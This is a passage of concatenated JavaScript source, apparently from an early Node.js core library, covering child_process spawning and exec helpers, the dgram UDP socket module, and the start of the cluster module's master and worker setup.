    cwd: options.cwd,
    env: options.env,
    gid: options.gid,
    uid: options.uid,
    windowsVerbatimArguments: !!options.windowsVerbatimArguments
  });

  var encoding;
  var _stdout;
  var _stderr;
  if (options.encoding !== 'buffer' && Buffer.isEncoding(options.encoding)) {
    encoding = options.encoding;
    _stdout = '';
    _stderr = '';
  } else {
    _stdout = [];
    _stderr = [];
    encoding = null;
  }
  var stdoutLen = 0;
  var stderrLen = 0;
  var killed = false;
  var exited = false;
  var timeoutId;

  var ex = null;

  function exithandler(code, signal) {
    if (exited) return;
    exited = true;

    if (timeoutId) {
      clearTimeout(timeoutId);
      timeoutId = null;
    }

    if (!callback) return;

    
    var stdout;
    var stderr;
    if (!encoding) {
      stdout = Buffer.concat(_stdout);
      stderr = Buffer.concat(_stderr);
    } else {
      stdout = _stdout;
      stderr = _stderr;
    }

    if (ex) {
      
    } else if (code === 0 && signal === null) {
      callback(null, stdout, stderr);
      return;
    }

    var cmd = file;
    if (args.length !== 0)
      cmd += ' ' + args.join(' ');

    if (!ex) {
      ex = new Error('Command failed: ' + cmd + '\n' + stderr);
      ex.killed = child.killed || killed;
      ex.code = code < 0 ? uv.errname(code) : code;
      ex.signal = signal;
    }

    ex.cmd = cmd;
    callback(ex, stdout, stderr);
  }

  function errorhandler(e) {
    ex = e;
    child.stdout.destroy();
    child.stderr.destroy();
    exithandler();
  }

  function kill() {
    child.stdout.destroy();
    child.stderr.destroy();

    killed = true;
    try {
      child.kill(options.killSignal);
    } catch (e) {
      ex = e;
      exithandler();
    }
  }

  if (options.timeout > 0) {
    timeoutId = setTimeout(function() {
      kill();
      timeoutId = null;
    }, options.timeout);
  }

  child.stdout.addListener('data', function(chunk) {
    stdoutLen += chunk.length;

    if (stdoutLen > options.maxBuffer) {
      ex = new Error('stdout maxBuffer exceeded.');
      kill();
    } else {
      if (!encoding)
        _stdout.push(chunk);
      else
        _stdout += chunk;
    }
  });

  child.stderr.addListener('data', function(chunk) {
    stderrLen += chunk.length;

    if (stderrLen > options.maxBuffer) {
      ex = new Error('stderr maxBuffer exceeded.');
      kill();
    } else {
      if (!encoding)
        _stderr.push(chunk);
      else
        _stderr += chunk;
    }
  });

  if (encoding) {
    child.stderr.setEncoding(encoding);
    child.stdout.setEncoding(encoding);
  }

  child.addListener('close', exithandler);
  child.addListener('error', errorhandler);

  return child;
};

var _deprecatedCustomFds = util.deprecate(function(options) {
  options.stdio = options.customFds.map(function(fd) {
    return fd === -1 ? 'pipe' : fd;
  });
}, 'child_process: customFds option is deprecated, use stdio instead.');

function _convertCustomFds(options) {
  if (options && options.customFds && !options.stdio) {
    _deprecatedCustomFds(options);
  }
}


function _validateStdio(stdio, sync) {
  var ipc,
      ipcFd;

  
  if (util.isString(stdio)) {
    switch (stdio) {
      case 'ignore': stdio = ['ignore', 'ignore', 'ignore']; break;
      case 'pipe': stdio = ['pipe', 'pipe', 'pipe']; break;
      case 'inherit': stdio = [0, 1, 2]; break;
      default: throw new TypeError('Incorrect value of stdio option: ' + stdio);
    }
  } else if (!util.isArray(stdio)) {
    throw new TypeError('Incorrect value of stdio option: ' +
        util.inspect(stdio));
  }

  
  
  
  
  while (stdio.length < 3) stdio.push(undefined);

  
  
  stdio = stdio.reduce(function(acc, stdio, i) {
    function cleanup() {
      acc.filter(function(stdio) {
        return stdio.type === 'pipe' || stdio.type === 'ipc';
      }).forEach(function(stdio) {
        if (stdio.handle)
          stdio.handle.close();
      });
    }

    
    if (util.isNullOrUndefined(stdio)) {
      stdio = i < 3 ? 'pipe' : 'ignore';
    }

    if (stdio === null || stdio === 'ignore') {
      acc.push({type: 'ignore'});
    } else if (stdio === 'pipe' || util.isNumber(stdio) && stdio < 0) {
      var a = {
        type: 'pipe',
        readable: i === 0,
        writable: i !== 0
      };

      if (!sync)
        a.handle = createPipe();

      acc.push(a);
    } else if (stdio === 'ipc') {
      if (sync || !util.isUndefined(ipc)) {
        
        cleanup();
        if (!sync)
          throw Error('Child process can have only one IPC pipe');
        else
          throw Error('You cannot use IPC with synchronous forks');
      }

      ipc = createPipe(true);
      ipcFd = i;

      acc.push({
        type: 'pipe',
        handle: ipc,
        ipc: true
      });
    } else if (stdio === 'inherit') {
      acc.push({
        type: 'inherit',
        fd: i
      });
    } else if (util.isNumber(stdio) || util.isNumber(stdio.fd)) {
      acc.push({
        type: 'fd',
        fd: stdio.fd || stdio
      });
    } else if (getHandleWrapType(stdio) || getHandleWrapType(stdio.handle) ||
               getHandleWrapType(stdio._handle)) {
      var handle = getHandleWrapType(stdio) ?
          stdio :
          getHandleWrapType(stdio.handle) ? stdio.handle : stdio._handle;

      acc.push({
        type: 'wrap',
        wrapType: getHandleWrapType(handle),
        handle: handle
      });
    } else if (util.isBuffer(stdio) || util.isString(stdio)) {
      if (!sync) {
        cleanup();
        throw new TypeError('Asynchronous forks do not support Buffer input: ' +
            util.inspect(stdio));
      }
    } else {
      
      cleanup();
      throw new TypeError('Incorrect value for stdio stream: ' +
          util.inspect(stdio));
    }

    return acc;
  }, []);

  return {stdio: stdio, ipc: ipc, ipcFd: ipcFd};
}


function normalizeSpawnArguments() {
  var args, options;

  var file = arguments[0];

  if (Array.isArray(arguments[1])) {
    args = arguments[1].slice(0);
    options = arguments[2];
  } else if (arguments[1] && !Array.isArray(arguments[1])) {
    throw new TypeError('Incorrect value of args option');
  } else {
    args = [];
    options = arguments[1];
  }

  if (!options)
    options = {};

  args.unshift(file);

  var env = (options && options.env ? options.env : null) || process.env;
  var envPairs = [];
  for (var key in env) {
    envPairs.push(key + '=' + env[key]);
  }

  _convertCustomFds(options);

  return {
    file: file,
    args: args,
    options: options,
    envPairs: envPairs
  };
}


var spawn = exports.spawn = function() {
  var opts = normalizeSpawnArguments.apply(null, arguments);

  var file = opts.file;
  var args = opts.args;
  var options = opts.options;
  var envPairs = opts.envPairs;

  var child = new ChildProcess();

  child.spawn({
    file: file,
    args: args,
    cwd: options ? options.cwd : null,
    windowsVerbatimArguments: !!(options && options.windowsVerbatimArguments),
    detached: !!(options && options.detached),
    envPairs: envPairs,
    stdio: options ? options.stdio : null,
    uid: options ? options.uid : null,
    gid: options ? options.gid : null
  });

  return child;
};


function maybeClose(subprocess) {
  subprocess._closesGot++;

  if (subprocess._closesGot == subprocess._closesNeeded) {
    subprocess.emit('close', subprocess.exitCode, subprocess.signalCode);
  }
}


function ChildProcess() {
  EventEmitter.call(this);

  
  process.binding('tcp_wrap');
  process.binding('pipe_wrap');

  var self = this;

  this._closesNeeded = 1;
  this._closesGot = 0;
  this.connected = false;

  this.signalCode = null;
  this.exitCode = null;
  this.killed = false;
  this.spawnfile = null;

  this._handle = new Process();
  this._handle.owner = this;

  this._handle.onexit = function(exitCode, signalCode) {
    
    
    
    
    
    
    
    
    
    
    var syscall = self.spawnfile ? 'spawn ' + self.spawnfile : 'spawn';
    var err = (exitCode < 0) ? errnoException(exitCode, syscall) : null;

    if (signalCode) {
      self.signalCode = signalCode;
    } else {
      self.exitCode = exitCode;
    }

    if (self.stdin) {
      self.stdin.destroy();
    }

    self._handle.close();
    self._handle = null;

    if (exitCode < 0) {
      if (self.spawnfile)
        err.path = self.spawnfile;

      self.emit('error', err);
    } else {
      self.emit('exit', self.exitCode, self.signalCode);
    }

    
    
    
    
    
    
    process.nextTick(function() {
      flushStdio(self);
    });

    maybeClose(self);
  };
}
util.inherits(ChildProcess, EventEmitter);


function flushStdio(subprocess) {
  if (subprocess.stdio == null) return;
  subprocess.stdio.forEach(function(stream, fd, stdio) {
    if (!stream || !stream.readable || stream._consuming ||
        stream._readableState.flowing)
      return;
    stream.resume();
  });
}



function getHandleWrapType(stream) {
  if (stream instanceof handleWraps.Pipe) return 'pipe';
  if (stream instanceof handleWraps.TTY) return 'tty';
  if (stream instanceof handleWraps.TCP) return 'tcp';
  if (stream instanceof handleWraps.UDP) return 'udp';

  return false;
}


ChildProcess.prototype.spawn = function(options) {
  var self = this,
      ipc,
      ipcFd,
      
      stdio = options.stdio || 'pipe';

  stdio = _validateStdio(stdio, false);

  ipc = stdio.ipc;
  ipcFd = stdio.ipcFd;
  stdio = options.stdio = stdio.stdio;

  if (!util.isUndefined(ipc)) {
    
    options.envPairs = options.envPairs || [];
    options.envPairs.push('NODE_CHANNEL_FD=' + ipcFd);
  }

  this.spawnfile = options.file;

  var err = this._handle.spawn(options);

  
  if (err === uv.UV_EAGAIN ||
      err === uv.UV_EMFILE ||
      err === uv.UV_ENFILE ||
      err === uv.UV_ENOENT) {
    process.nextTick(function() {
      self._handle.onexit(err);
    });
    
    
    
    
    
    if (err !== uv.UV_ENOENT) return err;
  } else if (err) {
    
    stdio.forEach(function(stdio) {
      if (stdio.type === 'pipe') {
        stdio.handle.close();
      }
    });

    this._handle.close();
    this._handle = null;
    throw errnoException(err, 'spawn');
  }

  this.pid = this._handle.pid;

  stdio.forEach(function(stdio, i) {
    if (stdio.type === 'ignore') return;

    if (stdio.ipc) {
      self._closesNeeded++;
      return;
    }

    if (stdio.handle) {
      
      
      stdio.socket = createSocket(self.pid !== 0 ? stdio.handle : null, i > 0);

      if (i > 0 && self.pid !== 0) {
        self._closesNeeded++;
        stdio.socket.on('close', function() {
          maybeClose(self);
        });
      }
    }
  });

  this.stdin = stdio.length >= 1 && !util.isUndefined(stdio[0].socket) ?
      stdio[0].socket : null;
  this.stdout = stdio.length >= 2 && !util.isUndefined(stdio[1].socket) ?
      stdio[1].socket : null;
  this.stderr = stdio.length >= 3 && !util.isUndefined(stdio[2].socket) ?
      stdio[2].socket : null;

  this.stdio = stdio.map(function(stdio) {
    return util.isUndefined(stdio.socket) ? null : stdio.socket;
  });

  
  if (!util.isUndefined(ipc)) setupChannel(this, ipc);

  return err;
};


ChildProcess.prototype.kill = function(sig) {
  var signal;

  if (!constants) {
    constants = process.binding('constants');
  }

  if (sig === 0) {
    signal = 0;
  } else if (!sig) {
    signal = constants['SIGTERM'];
  } else {
    signal = constants[sig];
  }

  if (util.isUndefined(signal)) {
    throw new Error('Unknown signal: ' + sig);
  }

  if (this._handle) {
    var err = this._handle.kill(signal);
    if (err === 0) {
      
      this.killed = true;
      return true;
    }
    if (err === uv.UV_ESRCH) {
      
    } else if (err === uv.UV_EINVAL || err === uv.UV_ENOSYS) {
      
      throw errnoException(err, 'kill');
    } else {
      
      this.emit('error', errnoException(err, 'kill'));
    }
  }

  
  return false;
};


ChildProcess.prototype.ref = function() {
  if (this._handle) this._handle.ref();
};


ChildProcess.prototype.unref = function() {
  if (this._handle) this._handle.unref();
};


function lookupSignal(signal) {
  if (typeof signal === 'number')
    return signal;

  if (!constants)
    constants = process.binding('constants');

  if (!(signal in constants))
    throw new Error('Unknown signal: ' + signal);

  return constants[signal];
}


function spawnSync() {
  var opts = normalizeSpawnArguments.apply(null, arguments);

  var options = opts.options;

  var i;

  options.file = opts.file;
  options.args = opts.args;

  if (options.killSignal)
    options.killSignal = lookupSignal(options.killSignal);

  options.stdio = _validateStdio(options.stdio || 'pipe', true).stdio;

  if (options.input) {
    var stdin = options.stdio[0] = util._extend({}, options.stdio[0]);
    stdin.input = options.input;
  }

  
  for (i = 0; i < options.stdio.length; i++) {
    var input = options.stdio[i] && options.stdio[i].input;
    if (input != null) {
      var pipe = options.stdio[i] = util._extend({}, options.stdio[i]);
      if (Buffer.isBuffer(input))
        pipe.input = input;
      else if (util.isString(input))
        pipe.input = new Buffer(input, options.encoding);
      else
        throw new TypeError(util.format(
            'stdio[%d] should be Buffer or string not %s',
            i,
            typeof input));
    }
  }

  if (!spawn_sync)
    spawn_sync = process.binding('spawn_sync');

  var result = spawn_sync.spawn(options);

  if (result.output && options.encoding) {
    for (i = 0; i < result.output.length; i++) {
      if (!result.output[i])
        continue;
      result.output[i] = result.output[i].toString(options.encoding);
    }
  }

  result.stdout = result.output && result.output[1];
  result.stderr = result.output && result.output[2];

  if (result.error)
    result.error = errnoException(result.error, 'spawnSync');

  util._extend(result, opts);

  return result;
}
exports.spawnSync = spawnSync;


function checkExecSyncError(ret) {
  if (ret.error || ret.status !== 0) {
    var err = ret.error;
    ret.error = null;

    if (!err) {
      var msg = 'Command failed: ' +
                (ret.cmd ? ret.cmd : ret.args.join(' ')) +
                (ret.stderr ? '\n' + ret.stderr.toString() : '');
      err = new Error(msg);
    }

    util._extend(err, ret);
    return err;
  }

  return false;
}


function execFileSync() {
  var opts = normalizeSpawnArguments.apply(null, arguments);
  var inheritStderr = !!!opts.options.stdio;

  var ret = spawnSync(opts.file, opts.args.slice(1), opts.options);

  if (inheritStderr)
    process.stderr.write(ret.stderr);

  var err = checkExecSyncError(ret);

  if (err)
    throw err;
  else
    return ret.stdout;
}
exports.execFileSync = execFileSync;


function execSync() {
  var opts = normalizeExecArgs.apply(null, arguments);
  var inheritStderr = opts.options ? !!!opts.options.stdio : true;

  var ret = spawnSync(opts.file, opts.args, opts.options);
  ret.cmd = opts.cmd;

  if (inheritStderr)
    process.stderr.write(ret.stderr);

  var err = checkExecSyncError(ret);

  if (err)
    throw err;
  else
    return ret.stdout;
}
exports.execSync = execSync;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 

========






















var assert = require('assert');
var util = require('util');
var events = require('events');
var constants = require('constants');

var UDP = process.binding('udp_wrap').UDP;

var BIND_STATE_UNBOUND = 0;
var BIND_STATE_BINDING = 1;
var BIND_STATE_BOUND = 2;


var cluster = null;
var dns = null;

var errnoException = util._errnoException;

function lookup(address, family, callback) {
  if (!dns)
    dns = require('dns');

  return dns.lookup(address, family, callback);
}


function lookup4(address, callback) {
  return lookup(address || '0.0.0.0', 4, callback);
}


function lookup6(address, callback) {
  return lookup(address || '::0', 6, callback);
}


function newHandle(type) {
  if (type == 'udp4') {
    var handle = new UDP;
    handle.lookup = lookup4;
    return handle;
  }

  if (type == 'udp6') {
    var handle = new UDP;
    handle.lookup = lookup6;
    handle.bind = handle.bind6;
    handle.send = handle.send6;
    return handle;
  }

  if (type == 'unix_dgram')
    throw new Error('unix_dgram sockets are not supported any more.');

  throw new Error('Bad socket type specified. Valid types are: udp4, udp6');
}


exports._createSocketHandle = function(address, port, addressType, fd) {
  
  assert(!util.isNumber(fd) || fd < 0);

  var handle = newHandle(addressType);

  if (port || address) {
    var err = handle.bind(address, port || 0, 0);
    if (err) {
      handle.close();
      return err;
    }
  }

  return handle;
};


function Socket(type, listener) {
  events.EventEmitter.call(this);

  if (typeof type === 'object') {
    var options = type;
    type = options.type;
  }

  var handle = newHandle(type);
  handle.owner = this;

  this._handle = handle;
  this._receiving = false;
  this._bindState = BIND_STATE_UNBOUND;
  this.type = type;
  this.fd = null; 

  
  this._reuseAddr = options && options.reuseAddr;

  if (util.isFunction(listener))
    this.on('message', listener);
}
util.inherits(Socket, events.EventEmitter);
exports.Socket = Socket;


exports.createSocket = function(type, listener) {
  return new Socket(type, listener);
};


function startListening(socket) {
  socket._handle.onmessage = onMessage;
  
  socket._handle.recvStart();
  socket._receiving = true;
  socket._bindState = BIND_STATE_BOUND;
  socket.fd = -42; 

  socket.emit('listening');
}

function replaceHandle(self, newHandle) {

  
  newHandle.lookup = self._handle.lookup;
  newHandle.bind = self._handle.bind;
  newHandle.send = self._handle.send;
  newHandle.owner = self;

  
  self._handle.close();
  self._handle = newHandle;
}

Socket.prototype.bind = function(port ) {
  var self = this;

  self._healthCheck();

  if (this._bindState != BIND_STATE_UNBOUND)
    throw new Error('Socket is already bound');

  this._bindState = BIND_STATE_BINDING;

  if (util.isFunction(arguments[arguments.length - 1]))
    self.once('listening', arguments[arguments.length - 1]);

  var UDP = process.binding('udp_wrap').UDP;
  if (port instanceof UDP) {
    replaceHandle(self, port);
    startListening(self);
    return;
  }

  var address;
  var exclusive;

  if (util.isObject(port)) {
    address = port.address || '';
    exclusive = !!port.exclusive;
    port = port.port;
  } else {
    address = util.isFunction(arguments[1]) ? '' : arguments[1];
    exclusive = false;
  }

  
  self._handle.lookup(address, function(err, ip) {
    if (err) {
      self._bindState = BIND_STATE_UNBOUND;
      self.emit('error', err);
      return;
    }

    if (!cluster)
      cluster = require('cluster');

    if (cluster.isWorker && !exclusive) {
      cluster._getServer(self, ip, port, self.type, -1, function(err, handle) {
        if (err) {
          self.emit('error', errnoException(err, 'bind'));
          self._bindState = BIND_STATE_UNBOUND;
          return;
        }

        if (!self._handle)
          
          return handle.close();

        replaceHandle(self, handle);
        startListening(self);
      });

    } else {
      if (!self._handle)
        return; 

      var flags = 0;
      if (self._reuseAddr)
        flags |= constants.UV_UDP_REUSEADDR;

      var err = self._handle.bind(ip, port || 0, flags);
      if (err) {
        self.emit('error', errnoException(err, 'bind'));
        self._bindState = BIND_STATE_UNBOUND;
        
        return;
      }

      startListening(self);
    }
  });
};



Socket.prototype.sendto = function(buffer,
                                   offset,
                                   length,
                                   port,
                                   address,
                                   callback) {
  if (!util.isNumber(offset) || !util.isNumber(length))
    throw new Error('send takes offset and length as args 2 and 3');

  if (!util.isString(address))
    throw new Error(this.type + ' sockets must send to port, address');

  this.send(buffer, offset, length, port, address, callback);
};


Socket.prototype.send = function(buffer,
                                 offset,
                                 length,
                                 port,
                                 address,
                                 callback) {
  var self = this;

  if (util.isString(buffer))
    buffer = new Buffer(buffer);

  if (!util.isBuffer(buffer))
    throw new TypeError('First argument must be a buffer or string.');

  offset = offset | 0;
  if (offset < 0)
    throw new RangeError('Offset should be >= 0');

  if ((length == 0 && offset > buffer.length) ||
      (length > 0 && offset >= buffer.length))
    throw new RangeError('Offset into buffer too large');

  
  
  length = length | 0;
  if (length < 0)
    throw new RangeError('Length should be >= 0');

  if (offset + length > buffer.length)
    throw new RangeError('Offset + length beyond buffer length');

  port = port | 0;
  if (port <= 0 || port > 65535)
    throw new RangeError('Port should be > 0 and < 65536');

  
  
  if (!util.isFunction(callback))
    callback = undefined;

  self._healthCheck();

  if (self._bindState == BIND_STATE_UNBOUND)
    self.bind(0, null);

  
  
  if (self._bindState != BIND_STATE_BOUND) {
    
    
    if (!self._sendQueue) {
      self._sendQueue = [];
      self.once('listening', function() {
        
        for (var i = 0; i < self._sendQueue.length; i++)
          self.send.apply(self, self._sendQueue[i]);
        self._sendQueue = undefined;
      });
    }
    self._sendQueue.push([buffer, offset, length, port, address, callback]);
    return;
  }

  self._handle.lookup(address, function(ex, ip) {
    if (ex) {
      if (callback) callback(ex);
      self.emit('error', ex);
    }
    else if (self._handle) {
      var req = { buffer: buffer, length: length };  
      if (callback) {
        req.callback = callback;
        req.oncomplete = afterSend;
      }
      var err = self._handle.send(req,
                                  buffer,
                                  offset,
                                  length,
                                  port,
                                  ip,
                                  !!callback);
      if (err && callback) {
        
        process.nextTick(function() {
          callback(errnoException(err, 'send'));
        });
      }
    }
  });
};


function afterSend(err) {
  this.callback(err ? errnoException(err, 'send') : null, this.length);
}


Socket.prototype.close = function() {
  this._healthCheck();
  this._stopReceiving();
  this._handle.close();
  this._handle = null;
  this.emit('close');
};


Socket.prototype.address = function() {
  this._healthCheck();

  var out = {};
  var err = this._handle.getsockname(out);
  if (err) {
    throw errnoException(err, 'getsockname');
  }

  return out;
};


Socket.prototype.setBroadcast = function(arg) {
  var err = this._handle.setBroadcast(arg ? 1 : 0);
  if (err) {
    throw errnoException(err, 'setBroadcast');
  }
};


Socket.prototype.setTTL = function(arg) {
  if (!util.isNumber(arg)) {
    throw new TypeError('Argument must be a number');
  }

  var err = this._handle.setTTL(arg);
  if (err) {
    throw errnoException(err, 'setTTL');
  }

  return arg;
};


Socket.prototype.setMulticastTTL = function(arg) {
  if (!util.isNumber(arg)) {
    throw new TypeError('Argument must be a number');
  }

  var err = this._handle.setMulticastTTL(arg);
  if (err) {
    throw errnoException(err, 'setMulticastTTL');
  }

  return arg;
};


Socket.prototype.setMulticastLoopback = function(arg) {
  var err = this._handle.setMulticastLoopback(arg ? 1 : 0);
  if (err) {
    throw errnoException(err, 'setMulticastLoopback');
  }

  return arg; 
};


Socket.prototype.addMembership = function(multicastAddress,
                                          interfaceAddress) {
  this._healthCheck();

  if (!multicastAddress) {
    throw new Error('multicast address must be specified');
  }

  var err = this._handle.addMembership(multicastAddress, interfaceAddress);
  if (err) {
    throw errnoException(err, 'addMembership');
  }
};


Socket.prototype.dropMembership = function(multicastAddress,
                                           interfaceAddress) {
  this._healthCheck();

  if (!multicastAddress) {
    throw new Error('multicast address must be specified');
  }

  var err = this._handle.dropMembership(multicastAddress, interfaceAddress);
  if (err) {
    throw errnoException(err, 'dropMembership');
  }
};


Socket.prototype._healthCheck = function() {
  if (!this._handle)
    throw new Error('Not running'); 
};


Socket.prototype._stopReceiving = function() {
  if (!this._receiving)
    return;

  this._handle.recvStop();
  this._receiving = false;
  this.fd = null; 
};


function onMessage(nread, handle, buf, rinfo) {
  var self = handle.owner;
  if (nread < 0) {
    return self.emit('error', errnoException(nread, 'recvmsg'));
  }
  rinfo.size = buf.length; 
  self.emit('message', buf, rinfo);
}


Socket.prototype.ref = function() {
  if (this._handle)
    this._handle.ref();
};


Socket.prototype.unref = function() {
  if (this._handle)
    this._handle.unref();
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

========






















var EventEmitter = require('events').EventEmitter;
var assert = require('assert');
var dgram = require('dgram');
var fork = require('child_process').fork;
var net = require('net');
var util = require('util');
var SCHED_NONE = 1;
var SCHED_RR = 2;

var cluster = new EventEmitter;
module.exports = cluster;
cluster.Worker = Worker;
cluster.isWorker = ('NODE_UNIQUE_ID' in process.env);
cluster.isMaster = (cluster.isWorker === false);


function Worker(options) {
  if (!(this instanceof Worker))
    return new Worker(options);

  EventEmitter.call(this);

  if (!util.isObject(options))
    options = {};

  this.suicide = undefined;
  this.state = options.state || 'none';
  this.id = options.id | 0;

  if (options.process) {
    this.process = options.process;
    this.process.on('error', this.emit.bind(this, 'error'));
    this.process.on('message', this.emit.bind(this, 'message'));
  }
}
util.inherits(Worker, EventEmitter);

Worker.prototype.kill = function() {
  this.destroy.apply(this, arguments);
};

Worker.prototype.send = function() {
  this.process.send.apply(this.process, arguments);
};

Worker.prototype.isDead = function isDead() {
  return this.process.exitCode != null || this.process.signalCode != null;
};

Worker.prototype.isConnected = function isConnected() {
  return this.process.connected;
};



function SharedHandle(key, address, port, addressType, backlog, fd) {
  this.key = key;
  this.workers = [];
  this.handle = null;
  this.errno = 0;

  
  var rval;
  if (addressType === 'udp4' || addressType === 'udp6')
    rval = dgram._createSocketHandle(address, port, addressType, fd);
  else
    rval = net._createServerHandle(address, port, addressType, fd);

  if (util.isNumber(rval))
    this.errno = rval;
  else
    this.handle = rval;
}

SharedHandle.prototype.add = function(worker, send) {
  assert(this.workers.indexOf(worker) === -1);
  this.workers.push(worker);
  send(this.errno, null, this.handle);
};

SharedHandle.prototype.remove = function(worker) {
  var index = this.workers.indexOf(worker);
  assert(index !== -1);
  this.workers.splice(index, 1);
  if (this.workers.length !== 0) return false;
  this.handle.close();
  this.handle = null;
  return true;
};




function RoundRobinHandle(key, address, port, addressType, backlog, fd) {
  this.key = key;
  this.all = {};
  this.free = [];
  this.handles = [];
  this.handle = null;
  this.server = net.createServer(assert.fail);

  if (fd >= 0)
    this.server.listen({ fd: fd });
  else if (port >= 0)
    this.server.listen(port, address);
  else
    this.server.listen(address);  

  var self = this;
  this.server.once('listening', function() {
    self.handle = self.server._handle;
    self.handle.onconnection = self.distribute.bind(self);
    self.server._handle = null;
    self.server = null;
  });
}

RoundRobinHandle.prototype.add = function(worker, send) {
  assert(worker.id in this.all === false);
  this.all[worker.id] = worker;

  var self = this;
  function done() {
    if (self.handle.getsockname) {
      var out = {};
      var err = self.handle.getsockname(out);
      
      send(null, { sockname: out }, null);
    }
    else {
      send(null, null, null);  
    }
    self.handoff(worker);  
  }

  if (util.isNull(this.server)) return done();
  
  this.server.once('listening', done);
  this.server.once('error', function(err) {
    
    
    
    var errno = process.binding('uv')['UV_' + err.errno];
    send(errno, null);
  });
};

RoundRobinHandle.prototype.remove = function(worker) {
  if (worker.id in this.all === false) return false;
  delete this.all[worker.id];
  var index = this.free.indexOf(worker);
  if (index !== -1) this.free.splice(index, 1);
  if (Object.getOwnPropertyNames(this.all).length !== 0) return false;
  for (var handle; handle = this.handles.shift(); handle.close());
  this.handle.close();
  this.handle = null;
  return true;
};

RoundRobinHandle.prototype.distribute = function(err, handle) {
  this.handles.push(handle);
  var worker = this.free.shift();
  if (worker) this.handoff(worker);
};

RoundRobinHandle.prototype.handoff = function(worker) {
  if (worker.id in this.all === false) {
    return;  
  }
  var handle = this.handles.shift();
  if (util.isUndefined(handle)) {
    this.free.push(worker);  
    return;
  }
  var message = { act: 'newconn', key: this.key };
  var self = this;
  sendHelper(worker.process, message, handle, function(reply) {
    if (reply.accepted)
      handle.close();
    else
      self.distribute(0, handle);  
    self.handoff(worker);
  });
};


if (cluster.isMaster)
  masterInit();
else
  workerInit();

function masterInit() {
  cluster.workers = {};

  var intercom = new EventEmitter;
  cluster.settings = {};

  
  var schedulingPolicy = {
    'none': SCHED_NONE,
    'rr': SCHED_RR
  }[process.env.NODE_CLUSTER_SCHED_POLICY];

  if (util.isUndefined(schedulingPolicy)) {
    
    
    schedulingPolicy = (process.platform === 'win32') ? SCHED_NONE : SCHED_RR;
  }

  cluster.schedulingPolicy = schedulingPolicy;
  cluster.SCHED_NONE = SCHED_NONE;  
  cluster.SCHED_RR = SCHED_RR;      

  
  
  
  var handles = {};

  var initialized = false;
  cluster.setupMaster = function(options) {
    var settings = {
      args: process.argv.slice(2),
      exec: process.argv[1],
      execArgv: process.execArgv,
      silent: false
    };
    settings = util._extend(settings, cluster.settings);
    settings = util._extend(settings, options || {});
    
    
    
    
    if (settings.execArgv.some(function(s) { return /^--prof/.test(s); }) &&
        !settings.execArgv.some(function(s) { return /^--logfile=/.test(s); }))
    {
      settings.execArgv = settings.execArgv.concat(['--logfile=v8-%p.log']);
    }
    cluster.settings = settings;
    if (initialized === true)
      return process.nextTick(function() {
        cluster.emit('setup', settings);
      });
    initialized = true;
    schedulingPolicy = cluster.schedulingPolicy;  
    assert(schedulingPolicy === SCHED_NONE || schedulingPolicy === SCHED_RR,
           'Bad cluster.schedulingPolicy: ' + schedulingPolicy);

    process.on('internalMessage', function(message) {
      if (message.cmd !== 'NODE_DEBUG_ENABLED') return;
      var key;
      for (key in cluster.workers)
        process._debugProcess(cluster.workers[key].process.pid);
    });

    process.nextTick(function() {
      cluster.emit('setup', settings);
    });
  };

  function createWorkerProcess(id, env) {
    var workerEnv = util._extend({}, process.env);
    var execArgv = cluster.settings.execArgv.slice();
    var debugPort = process.debugPort + id;
    var hasDebugArg = false;

    workerEnv = util._extend(workerEnv, env);
    workerEnv.NODE_UNIQUE_ID = '' + id;

    for (var i = 0; i < execArgv.length; i++) {
      var match = execArgv[i].match(/^(--debug|--debug-brk)(=\d+)?$/);

      if (match) {
        execArgv[i] = match[1] + '=' + debugPort;
        hasDebugArg = true;
      }
    }

    if (!hasDebugArg)
      execArgv = ['--debug-port=' + debugPort].concat(execArgv);

    return fork(cluster.settings.exec, cluster.settings.args, {
      env: workerEnv,
      silent: cluster.settings.silent,
      execArgv: execArgv,
      gid: cluster.settings.gid,
      uid: cluster.settings.uid
    });
  }

  var ids = 0;

  cluster.fork = function(env) {
    cluster.setupMaster();
    var id = ++ids;
    var workerProcess = createWorkerProcess(id, env);
    var worker = new Worker({
      id: id,
      process: workerProcess
    });

    function removeWorker(worker) {
      assert(worker);

      delete cluster.workers[worker.id];

      if (Object.keys(cluster.workers).length === 0) {
        assert(Object.keys(handles).length === 0, 'Resource leak detected.');
        intercom.emit('disconnect');
      }
    }

    function removeHandlesForWorker(worker) {
      assert(worker);

      for (var key in handles) {
        var handle = handles[key];
        if (handle.remove(worker)) delete handles[key];
      }
    }

    worker.process.once('exit', function(exitCode, signalCode) {
      
      if (!worker.isConnected()) removeWorker(worker);

      worker.suicide = !!worker.suicide;
      worker.state = 'dead';
      worker.emit('exit', exitCode, signalCode);
      cluster.emit('exit', worker, exitCode, signalCode);
    });

    worker.process.once('disconnect', function() {
      
      removeHandlesForWorker(worker);

      
      if (worker.isDead()) removeWorker(worker);

      worker.suicide = !!worker.suicide;
      worker.state = 'disconnected';
      worker.emit('disconnect');
      cluster.emit('disconnect', worker);
    });

    worker.process.on('internalMessage', internal(worker, onmessage));
    process.nextTick(function() {
      cluster.emit('fork', worker);
    });
    cluster.workers[worker.id] = worker;
    return worker;
  };

  cluster.disconnect = function(cb) {
    var workers = Object.keys(cluster.workers);
    if (workers.length === 0) {
      process.nextTick(intercom.emit.bind(intercom, 'disconnect'));
    } else {
      for (var key in workers) {
        key = workers[key];
        cluster.workers[key].disconnect();
      }
    }
    if (cb) intercom.once('disconnect', cb);
  };

  Worker.prototype.disconnect = function() {
    this.suicide = true;
    send(this, { act: 'disconnect' });
  };

